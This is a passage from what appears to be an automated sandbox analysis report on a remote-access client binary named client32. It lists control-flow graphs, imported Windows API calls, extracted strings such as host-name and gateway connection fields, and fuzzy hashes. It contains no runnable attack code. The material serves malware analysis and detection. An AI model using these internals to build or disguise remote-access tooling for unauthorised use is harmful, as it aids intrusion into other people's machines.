1196->1210 1211 1102e93c-1102e942 1196->1211 1197->1177 1197->1201 1198->1182 1198->1192 1199->1161 1207 1102e735-1102e74a call 110b7df0 call 1102a1f0 1201->1207 1208 1102e74c-1102e75f call 11081d30 1201->1208 1234 1102e7a3-1102e7bc call 11081d30 1207->1234 1223 1102e761-1102e784 1208->1223 1224 1102e786-1102e788 1208->1224 1214 1102e97c-1102ea08 call 11162777 * 2 call 11147060 * 2 GetCurrentProcessId call 110ee150 call 11028290 call 11147060 call 11162bb7 1210->1214 1215 1102e96c-1102e979 call 11036710 call 11162777 1210->1215 1211->1210 1219 1102e944-1102e95d call 1102d900 1211->1219 1215->1214 1219->1210 1223->1234 1229 1102e790-1102e7a1 1224->1229 1229->1229 1229->1234 1237 1102e613-1102e61f 1230->1237 1231->1237 1245 1102e5a5-1102e5ae 1231->1245 1254 1102e7c2-1102e83d call 11147060 call 110cfe80 call 110d16d0 call 110b7df0 wsprintfA call 110b7df0 wsprintfA 1234->1254 1255 1102e8fc-1102e909 call 11164ed0 1234->1255 1243 1102e662-1102e671 1237->1243 1244 1102e621-1102e62d 1237->1244 1243->1164 1246 1102e673-1102e674 FreeLibrary 1243->1246 1249 1102e63f-1102e643 1244->1249 1250 1102e62f-1102e63d GetProcAddress 1244->1250 1245->1237 1256 1102e5b0-1102e5e6 call 11147060 call 1112c1b0 1245->1256 1246->1164 1251 1102e654-1102e656 SetLastError 1249->1251 1252 1102e645-1102e648 1249->1252 1250->1249 1259 1102e65c 1251->1259 1252->1259 1291 1102e853-1102e869 call 11129e00 1254->1291 1292 1102e83f-1102e84e call 11029a70 1254->1292 1268 1102e90c-1102e911 CharUpperA 1255->1268 1256->1237 1276 1102e5e8-1102e60e call 11147060 call 11027f80 1256->1276 1259->1243 1268->1196 1276->1237 1296 1102e882-1102e8bc call 110d0e20 * 2 1291->1296 1297 1102e86b-1102e87d call 110d0e20 1291->1297 1292->1291 1304 1102e8d2-1102e8fa call 11164ed0 call 110d0a10 1296->1304 1305 1102e8be-1102e8cd call 11029a70 1296->1305 1297->1296 1304->1268 1305->1304
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wsprintf
                                                                                                                                                                                • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$18/11/16 11:28:14 V12.10F20$301389$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                                                                                • API String ID: 2111968516-275318974
                                                                                                                                                                                • Opcode ID: 71854caebe92ca2b3116755f37c7ecce6566e7e7254ed1b0d8e2eadf40ed8f04
                                                                                                                                                                                • Instruction ID: ec88a390f79512b50aba7168cc31da78705c53b3cca2911266f0d70c00f4e6f9
                                                                                                                                                                                • Opcode Fuzzy Hash: 71854caebe92ca2b3116755f37c7ecce6566e7e7254ed1b0d8e2eadf40ed8f04
                                                                                                                                                                                • Instruction Fuzzy Hash: 8232B175D4127A9FDB22CF90CC84BEDB7B8BB44308F8445E9E559A7280EB706E84CB51
                                                                                                                                                                                Function 6C613D00 Relevance: 68.6, APIs: 11, Strings: 28, Instructions: 392COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1941 6c613d00-6c613d42 call 6c621c50 call 6c613b80 1945 6c613d47-6c613d4f 1941->1945 1946 6c613d51-6c613d6b call 6c6228e1 1945->1946 1947 6c613d6c-6c613d6e 1945->1947 1949 6c613d70-6c613d84 call 6c606f50 1947->1949 1950 6c613d87-6c613da1 call 6c608fb0 1947->1950 1949->1950 1956 6c613da3-6c613dc4 call 6c6063c0 call 6c6228e1 1950->1956 1957 6c613dc5-6c613e44 call 6c605e90 * 2 call 6c617be0 call 6c605e20 lstrlenA 1950->1957 1970 6c613e46-6c613e95 call 6c61d8b0 call 6c605060 call 6c604830 _free 1957->1970 1971 6c613e98-6c613fbe call 6c605500 call 6c606050 call 6c617c70 * 2 call 6c617d00 * 3 call 6c605060 call 6c617d00 _free call 6c617d00 gethostname call 6c617d00 call 6c60b8e0 1957->1971 1970->1971 2002 6c613fc0 1971->2002 2003 6c613fc5-6c613fe1 call 6c617d00 1971->2003 2002->2003 2006 6c613fe3-6c613ff5 call 6c617d00 2003->2006 2007 6c613ff8-6c613ffe 2003->2007 2006->2007 2009 6c614004-6c614022 call 6c605e20 2007->2009 2010 6c61421a-6c614263 call 6c617b60 _free call 6c6098d0 call 6c6177e0 2007->2010 2017 6c614024-6c614057 call 6c605060 call 6c617d00 _free 2009->2017 2018 6c61405a-6c614084 call 6c605e20 2009->2018 2030 6c614292-6c6142aa call 6c6228e1 2010->2030 2031 6c614265-6c614291 call 6c60a4e0 call 6c6228e1 2010->2031 2017->2018 2025 6c6141d1-6c614217 call 6c617d00 call 6c605e20 call 6c617d00 2018->2025 2026 6c61408a-6c6141ce call 6c605060 call 6c617d00 _free call 6c605e20 call 6c605060 call 6c617d00 _free call 6c605e20 call 6c605060 call 6c617d00 _free call 6c605e20 call 6c605060 call 6c617d00 _free 2018->2026 2025->2010 2026->2025
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _memset
                                                                                                                                                                                • String ID: *Dept$*Gsk$1.1$301389$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                                                                                                                • API String ID: 2102423945-4053615097
                                                                                                                                                                                • Opcode ID: 9026a91d77903f7920bc4db18c514b6abb45c12784c62f06cebb2ab74fc7837e
                                                                                                                                                                                • Instruction ID: 8bfe0c17c57219a3c1ce871b92d7c0d946fd56b0aa7f55a19bac858bcb42128d
                                                                                                                                                                                • Opcode Fuzzy Hash: 9026a91d77903f7920bc4db18c514b6abb45c12784c62f06cebb2ab74fc7837e
                                                                                                                                                                                • Instruction Fuzzy Hash: 9AE173B2D0411C6ACB25DB64CC80EEF77789F46309F0085D9E509B3A41DB359B888FAD
                                                                                                                                                                                Function 11144140 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 2066 11144140-11144181 GetModuleFileNameA 2067 111441c3 2066->2067 2068 11144183-11144196 call 11081e00 2066->2068 2069 111441c9-111441cd 2067->2069 2068->2067 2077 11144198-111441c1 LoadLibraryA 2068->2077 2071 111441cf-111441dc LoadLibraryA 2069->2071 2072 111441e9-11144207 GetModuleHandleA GetProcAddress 2069->2072 2071->2072 2074 111441de-111441e6 LoadLibraryA 2071->2074 2075 11144217-11144240 GetProcAddress * 4 2072->2075 2076 11144209-11144215 2072->2076 2074->2072 2078 11144243-111442bb GetProcAddress * 10 call 11162bb7 2075->2078 2076->2078 2077->2069 2080 111442c0-111442c3 2078->2080
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,74DF23A0), ref: 11144173
                                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 111441BC
                                                                                                                                                                                • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 111441D5
                                                                                                                                                                                • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 111441E4
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?), ref: 111441EA
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 111441FE
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114421D
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11144228
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11144233
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114423E
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11144249
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11144254
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114425F
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114426A
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11144275
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11144280
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1114428B
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11144296
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111442A1
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111442AC
                                                                                                                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                                                                                                                • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                                                                                                                • API String ID: 3874234733-2061581830
                                                                                                                                                                                • Opcode ID: 21c7c7c97a5e8c709a1ef93a966535786b5a33ca8e8e15db7fba2e707341d37f
                                                                                                                                                                                • Instruction ID: c7cebb5ad097969c59afa36c8b157edb2e0deacaa1fcee2d42955e2ce7c14d1b
                                                                                                                                                                                • Opcode Fuzzy Hash: 21c7c7c97a5e8c709a1ef93a966535786b5a33ca8e8e15db7fba2e707341d37f
                                                                                                                                                                                • Instruction Fuzzy Hash: 74416174A40704AFDB289F769D84E6BFBF8FF55B18B50492EE445D3A00EB74E8008B59
                                                                                                                                                                                Function 110AA170 Relevance: 54.5, APIs: 26, Strings: 5, Instructions: 236libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 2166 110aa170-110aa1d2 LoadLibraryA GetProcAddress 2167 110aa1d8-110aa1e9 SetupDiGetClassDevsA 2166->2167 2168 110aa2e5-110aa2ed SetLastError 2166->2168 2169 110aa1ef-110aa1fd 2167->2169 2170 110aa3f3-110aa3f5 2167->2170 2174 110aa2f9-110aa2fb SetLastError 2168->2174 2171 110aa200-110aa204 2169->2171 2172 110aa3fe-110aa400 2170->2172 2173 110aa3f7-110aa3f8 FreeLibrary 2170->2173 2175 110aa21d-110aa235 2171->2175 2176 110aa206-110aa217 GetProcAddress 2171->2176 2177 110aa417-110aa432 call 11162bb7 2172->2177 2173->2172 2178 110aa301-110aa30c GetLastError 2174->2178 2175->2178 2188 110aa23b-110aa23d 2175->2188 2176->2174 2176->2175 2180 110aa312-110aa31d call 11163aa5 2178->2180 2181 110aa3a0-110aa3b1 GetProcAddress 2178->2181 2180->2171 2182 110aa3bb-110aa3bd SetLastError 2181->2182 2183 110aa3b3-110aa3b9 SetupDiDestroyDeviceInfoList 2181->2183 2187 110aa3c3-110aa3c5 2182->2187 2183->2187 2187->2170 2190 110aa3c7-110aa3e9 CreateFileA 2187->2190 2191 110aa248-110aa24a 2188->2191 2192 110aa23f-110aa245 call 11163aa5 2188->2192 2193 110aa3eb-110aa3f0 call 11163aa5 2190->2193 2194 110aa402-110aa40c call 11163aa5 2190->2194 2196 110aa24c-110aa25f GetProcAddress 2191->2196 2197 110aa265-110aa27b 2191->2197 2192->2191 2193->2170 2206 110aa40e-110aa40f FreeLibrary 2194->2206 2207 110aa415 2194->2207 2196->2197 2200 110aa322-110aa32a SetLastError 2196->2200 2202 110aa27d-110aa286 GetLastError 2197->2202 2208 110aa28c-110aa29f call 11163a11 2197->2208 2200->2202 2202->2208 2209 110aa361-110aa372 call 110aa110 2202->2209 2206->2207 2207->2177 2214 110aa382-110aa393 call 110aa110 2208->2214 2215 110aa2a5-110aa2ad 2208->2215 2216 110aa37b-110aa37d 2209->2216 2217 110aa374-110aa375 FreeLibrary 2209->2217 2214->2216 2225 110aa395-110aa39e FreeLibrary 2214->2225 2218 110aa2af-110aa2c2 GetProcAddress 2215->2218 2219 110aa2c4-110aa2db 2215->2219 2216->2177 2217->2216 2218->2219 2221 110aa32f-110aa331 SetLastError 2218->2221 2223 110aa337-110aa351 call 110aa110 call 11163aa5 2219->2223 2227 110aa2dd-110aa2e0 2219->2227 2221->2223 2223->2216 2231 110aa353-110aa35c FreeLibrary 2223->2231 2225->2177 2227->2171 2231->2177
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(setupapi.dll,2520CF5D,00000000,00000000,?), ref: 110AA1A3
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110AA1C7
                                                                                                                                                                                • SetupDiGetClassDevsA.SETUPAPI(111A7EDC,00000000,00000000,00000012), ref: 110AA1E1
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110AA20C
                                                                                                                                                                                • _free.LIBCMT ref: 110AA240
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA252
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 110AA27D
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA2B5
                                                                                                                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,111856D8), ref: 110AA2E7
                                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 110AA2FB
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 110AA301
                                                                                                                                                                                • _free.LIBCMT ref: 110AA313
                                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 110AA324
                                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 110AA331
                                                                                                                                                                                • _free.LIBCMT ref: 110AA344
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?), ref: 110AA354
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,111856D8), ref: 110AA3F8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup
                                                                                                                                                                                • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                                                                                                                                • API String ID: 1750251082-3340099623
                                                                                                                                                                                • Opcode ID: 5c097fbfbd98fca1bf11e3ac52a81ecc86ca0ace42baa1ed25a2d96ea0080c7b
                                                                                                                                                                                • Instruction ID: 5c4fa76f58df98f84a8804f3b2f927c1121c913996f050c4ed1f836ab53a5840
                                                                                                                                                                                • Opcode Fuzzy Hash: 5c097fbfbd98fca1bf11e3ac52a81ecc86ca0ace42baa1ed25a2d96ea0080c7b
                                                                                                                                                                                • Instruction Fuzzy Hash: CE818472D40219EBEB04DFE4ED88F9EBBB8AF44704F104528F922A76C4DB759945CB50
                                                                                                                                                                                Function 1102E199 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 2232 1102e199 2233 1102e1a0-1102e1b1 2232->2233 2233->2233 2234 1102e1b3 2233->2234 2235 1102e2f4-1102e30d call 11143690 2234->2235 2238 1102e313-1102e315 2235->2238 2239 1102e190-1102e193 2235->2239 2242 1102e413-1102e42d call 11146fe0 2238->2242 2243 1102e31b-1102e321 2238->2243 2240 1102e195-1102e197 2239->2240 2241 1102e1b8-1102e1c1 2239->2241 2240->2233 2241->2235 2247 1102e1c7-1102e1ce 2241->2247 2269 1102e483-1102e48f call 1102bc40 2242->2269 2270 1102e42f-1102e448 call 1105e820 2242->2270 2245 1102e323-1102e332 call 11145990 2243->2245 2246 1102e338-1102e348 2243->2246 2245->2246 2259 1102e34a 2246->2259 2260 1102e34f-1102e36d call 1102d360 2246->2260 2247->2235 2250 1102e2c3-1102e2d8 call 11163ca7 2247->2250 2251 1102e1d5-1102e1d7 2247->2251 2252 1102e2da-1102e2ef call 11163ca7 2247->2252 2253 1102e26a-1102e29d call 11162777 call 11142e60 2247->2253 2254 1102e2ab-1102e2c1 call 11164ed0 2247->2254 2255 1102e25b-1102e265 2247->2255 2256 1102e29f-1102e2a9 2247->2256 2257 1102e21c-1102e222 2247->2257 2258 1102e24c-1102e256 2247->2258 2250->2235 2251->2235 2271 1102e1dd-1102e217 call 11162777 call 11142e60 call 1102d360 2251->2271 2252->2235 2253->2235 2254->2235 2255->2235 2256->2235 2261 1102e224-1102e238 call 11163ca7 2257->2261 2262 1102e23d-1102e247 2257->2262 2258->2235 2259->2260 2260->2242 2284 1102e373-1102e398 call 110b7df0 call 11147060 2260->2284 2261->2235 2262->2235 2288 1102e491-1102e498 2269->2288 2289 1102e468-1102e46f 2269->2289 2270->2269 2290 1102e44a-1102e45c 2270->2290 2271->2235 2315 1102e3a3-1102e3a9 2284->2315 2316 1102e39a-1102e3a1 2284->2316 2294 1102e475-1102e478 2288->2294 2296 1102e49a-1102e4a4 2288->2296 2289->2294 2295 1102e67a-1102e69b GetComputerNameA 2289->2295 2290->2269 2306 1102e45e 2290->2306 2300 1102e47a-1102e481 call 110b7df0 2294->2300 2301 1102e4a9 2294->2301 2303 1102e6d3-1102e6d9 2295->2303 2304 1102e69d-1102e6d1 call 11028230 2295->2304 2296->2295 2309 1102e4ac-1102e586 call 11027f40 call 110281e0 call 11027f40 * 2 LoadLibraryA GetProcAddress 2300->2309 2301->2309 2310 1102e6db-1102e6e0 2303->2310 2311 1102e70f-1102e722 call 11164ed0 2303->2311 2304->2303 2335 1102e727-1102e733 2304->2335 2306->2289 2370 1102e64a-1102e652 SetLastError 2309->2370 2371 1102e58c-1102e5a3 2309->2371 2319 1102e6e6-1102e6ea 2310->2319 2329 1102e917-1102e93a 2311->2329 2322 1102e3ab-1102e3b2 call 11028360 2315->2322 2323 1102e409 2315->2323 2316->2242 2324 1102e706-1102e708 2319->2324 2325 1102e6ec-1102e6ee 2319->2325 2322->2323 2342 1102e3b4-1102e3e6 2322->2342 2323->2242 2331 1102e70b-1102e70d 2324->2331 2327 1102e702-1102e704 2325->2327 2328 1102e6f0-1102e6f6 2325->2328 2327->2331 2328->2324 2337 1102e6f8-1102e700 2328->2337 2345 1102e962-1102e96a 2329->2345 2346 1102e93c-1102e942 2329->2346 2331->2311 2331->2335 2340 1102e735-1102e74a call 110b7df0 call 1102a1f0 2335->2340 2341 1102e74c-1102e75f call 11081d30 2335->2341 2337->2319 2337->2327 2373 1102e7a3-1102e7bc call 11081d30 2340->2373 2358 1102e761-1102e784 2341->2358 2359 1102e786-1102e788 2341->2359 2361 1102e3f0-1102e3ff call 110f64d0 2342->2361 2362 1102e3e8-1102e3ee 2342->2362 2348 1102e97c-1102ea08 call 11162777 * 2 call 11147060 * 2 GetCurrentProcessId call 110ee150 call 11028290 call 11147060 call 11162bb7 2345->2348 2349 1102e96c-1102e979 call 11036710 call 11162777 2345->2349 2346->2345 2353 1102e944-1102e95d call 1102d900 2346->2353 2349->2348 2353->2345 2358->2373 2368 1102e790-1102e7a1 2359->2368 2365 1102e402-1102e404 call 1102d900 2361->2365 2362->2361 2362->2365 2365->2323 2368->2368 2368->2373 2376 1102e613-1102e61f 2370->2376 2371->2376 2389 1102e5a5-1102e5ae 2371->2389 2396 1102e7c2-1102e83d call 11147060 call 110cfe80 call 110d16d0 call 110b7df0 wsprintfA call 110b7df0 wsprintfA 2373->2396 2397 1102e8fc-1102e909 call 11164ed0 2373->2397 2384 1102e662-1102e671 2376->2384 2385 1102e621-1102e62d 2376->2385 2384->2295 2386 1102e673-1102e674 FreeLibrary 2384->2386 2390 1102e63f-1102e643 2385->2390 2391 1102e62f-1102e63d GetProcAddress 2385->2391 2386->2295 2389->2376 2394 1102e5b0-1102e5e6 call 11147060 call 1112c1b0 2389->2394 2392 1102e654-1102e656 SetLastError 2390->2392 2393 1102e645-1102e648 2390->2393 2391->2390 2398 1102e65c 2392->2398 2393->2398 2394->2376 2417 1102e5e8-1102e60e call 11147060 call 11027f80 2394->2417 2432 1102e853-1102e869 call 11129e00 2396->2432 2433 1102e83f-1102e84e call 11029a70 2396->2433 2410 1102e90c-1102e911 CharUpperA 2397->2410 2398->2384 2410->2329 2417->2376 2437 1102e882-1102e8bc call 110d0e20 * 2 2432->2437 2438 1102e86b-1102e87d call 110d0e20 2432->2438 2433->2432 2445 1102e8d2-1102e8fa call 11164ed0 call 110d0a10 2437->2445 2446 1102e8be-1102e8cd call 11029a70 2437->2446 2438->2437 2445->2410 2446->2445
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,?,?,?,?,00000100), ref: 1102E501
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
